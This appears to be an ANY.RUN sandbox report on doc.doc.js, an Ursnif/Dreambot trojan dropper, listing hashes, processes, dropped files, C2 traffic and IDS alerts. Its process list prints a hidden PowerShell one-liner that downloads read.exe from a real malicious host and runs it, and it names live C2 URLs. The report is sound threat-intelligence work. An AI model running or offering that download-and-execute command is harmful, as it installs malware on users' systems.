analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

doc.doc.js

Full analysis: https://app.any.run/tasks/5c5c2eea-3614-443d-9bbc-80d717508d3f
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: April 15, 2019, 03:21:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gozi
ursnif
evasion
dreambot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

BB1F6BA7497C8B8EBF96780E89589D52

SHA1:

72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1

SHA256:

A8618B73AF6706331E6E47D655BEE5B0D08F3349ED7DF70714C66296D000C1FC

SSDEEP:

192:B1UGh2AnP3I8hSTMsrN4ZjwP1ttvqmGOpoZ1emwVesKf0Hkgp24R4tkJqP9tVkBB:B1UM2AnP3I8hSTMsrN4ZjwP1ttvqmzKq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • TempbsK70.exe (PID: 2408)
    • Detected URSNIF Trojan

      • TempbsK70.exe (PID: 2408)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3812)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 2036)
    • Runs injected code in another process

      • TempbsK70.exe (PID: 2408)
    • Application was injected by another process

      • explorer.exe (PID: 2036)
    • Connects to CnC server

      • explorer.exe (PID: 2036)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 2036)
  • SUSPICIOUS

    • Executes scripts

      • explorer.exe (PID: 2036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3308)
    • Creates files in the user directory

      • powershell.exe (PID: 3308)
      • TempbsK70.exe (PID: 2408)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3364)
      • explorer.exe (PID: 2036)
    • Checks for external IP

      • nslookup.exe (PID: 2652)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempbsk70.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3364"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\doc.doc.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3812"C:\Windows\System32\cmd.exe" /c dRPSwHkjGELpyDb & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','%temp%bsK70.exe'); & start %temp%bsK70.exe & gZBHciRsnSOXFuNC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3308powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','C:\Users\admin\AppData\Local\TempbsK70.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2408C:\Users\admin\AppData\Local\TempbsK70.exe C:\Users\admin\AppData\Local\TempbsK70.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2036C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3920cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\3CB8.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2652nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1708cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\3CB8.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
339
Read events
257
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UYCMT3M55MM7YOFRHBUX.temp
MD5:
SHA256:
2408TempbsK70.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
MD5:
SHA256:
3920cmd.exeC:\Users\admin\AppData\Local\Temp\3CB8.bi1
MD5:
SHA256:
1708cmd.exeC:\Users\admin\AppData\Local\Temp\3CB8.bi1
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Local\Temp\726B.bin
MD5:
SHA256:
3308powershell.exeC:\Users\admin\AppData\Local\TempbsK70.exeexecutable
MD5:EA4907A6AC5AE8CCBC11CA8B5726F101
SHA256:F5A5E7D86C3131B3F0A479FA55F35F8FA7C0EA7615B244752F96071156982071
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3308powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF106478.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2036explorer.exeC:\Users\admin\AppData\Local\Temp\8814.bincompressed
MD5:909A2E6E8DB3D46EFFF8105030E8B65F
SHA256:E66A63A0AFC36797418F6735ECF139D7BB54F080105D56D7857ADADEBDB12A8A
2036explorer.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.jstext
MD5:B99A14DD4819D1AE8BED40FA744929D4
SHA256:4BAFB432100E622B0988C72EB504005A7B746AEFE7D876F95B6B9BDA40D63182
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3308
powershell.exe
GET
212.98.131.181:80
http://instant-payments.ru/read.exe
LB
malicious
2036
explorer.exe
GET
37.34.176.37:80
http://adonis-medicine.at/images/JFpO6jr2HSBA0/z4PcGJiu/dy6vv_2FqKUdAwPrkZjHVOJ/VpBqM5_2F7/rdvkvou0mSbwTbq22/5JQdLIgAy29J/o1qDwW4lUKt/zfAw_2BvKmsqm7/NqooCwSqFxNg9T5H2aM4_/2FS3NKszND0zAThP/7gYLgjoXCakgO4X/VPiCXIe4rrhKXtve6I/SMz0o5PBoBrY2rq26Wz/pdo.gif
KW
malicious
2036
explorer.exe
POST
37.34.176.37:80
http://adonis-medicine.at/images/JzQhh0y_2FqO_2B_2Fj_2/Fg8QwnF20isHP246/ixvzVygLdQR9H8F/2syPnbHfFtT9WozCT3/s1etZpxbt/TA6hEzLNyde0UCulsKxm/EfBEzVbPvW1ZUgN_2Bp/H_2BSikKicRqSkJu_2FrZN/HqhvyT_2BIX88/lEN5wg5O/DbkTTBbmyvSXRLu1hTaUFgN/2EkBrLEebk/gv6ZHZCnJg1TKnQ_2/FWf4MI8NteI/T2t_2BUfJAE/v.bmp
KW
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2036
explorer.exe
37.34.176.37:80
instant-payments.ru
Mobile Telecommunications Company
KW
malicious
2652
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
3308
powershell.exe
212.98.131.181:80
instant-payments.ru
TerraNet sal
LB
suspicious

DNS requests

Domain
IP
Reputation
instant-payments.ru
  • 212.98.131.181
  • 197.157.216.75
  • 89.47.94.113
  • 89.17.225.163
  • 84.224.225.228
  • 143.208.165.41
  • 181.39.233.180
  • 85.187.48.16
  • 151.237.80.80
  • 37.34.176.37
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 185.217.117.168
shared
adonis-medicine.at
  • 37.34.176.37
  • 89.45.19.18
  • 217.12.199.168
  • 93.103.166.70
  • 197.255.246.6
  • 62.141.241.11
  • 92.86.0.85
  • 87.116.78.110
  • 197.157.216.75
  • 62.73.70.146
malicious

Threats

PID
Process
Class
Message
3308
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2652
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2652
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2036
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
2036
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Data Exfil
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
4 ETPRO signatures available at the full report
No debug info